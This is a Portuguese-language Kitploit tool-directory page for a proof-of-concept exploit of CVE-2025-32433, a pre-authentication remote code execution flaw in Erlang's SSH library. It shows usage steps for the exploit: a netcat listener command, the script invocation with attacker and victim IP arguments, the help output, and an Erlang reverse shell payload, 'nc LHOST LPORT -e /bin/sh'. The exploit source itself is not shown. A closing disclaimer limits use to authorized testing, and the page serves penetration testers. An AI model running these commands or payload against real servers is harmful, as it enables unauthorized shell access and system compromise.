Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3243 — Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticada por meio de pacotes SSH_MSG_CHANNEL_REQUEST malformados. | Kitploit
Ferramentas/GitHubGitHub/tenebrae93/cve-2025-3243
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticada por meio de pacotes SSH_MSG_CHANNEL_REQUEST malformados.

Ver Repositório
71há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit da Biblioteca SSH do Erlang CVE-2025-32433

Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticado através de pacotes SSH_MSG_CHANNEL_REQUEST malformados.


Características

  • Exploit original por Matthew Keeley
  • Versão atualizada por Tyler Ramsbey:
    • Argumentos de linha de comando para LHOST, LPORT, RHOST e RPORT
    • Ajuda e uso integrados via argparse
    • Payload de reverse shell no estilo Erlang usando os:cmd("nc LHOST LPORT -e /bin/sh").
    • Decomposição limpa de funções e registro de status para cada etapa

Pré-requisitos

  • Python 3
  • Um listener nc (Netcat) funcional na sua máquina atacante
  • Acesso de rede ao serviço SSH alvo (porta padrão 22)

Uso

  1. Inicie seu listener na máquina atacante:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Execute o exploit:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
    
  3. Aguarde o shell conectar de volta ao seu listener.

Menu de Ajuda

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

Créditos

  • Script original por Matthew Keeley (MattKeeley)
  • Esta versão atualizada por Tyler Ramsbey

Aviso Legal

Use este código apenas em sistemas que você possui ou tem permissão explícita para testar. A exploração não autorizada de vulnerabilidades é ilegal e antiética.

Baixar ferramenta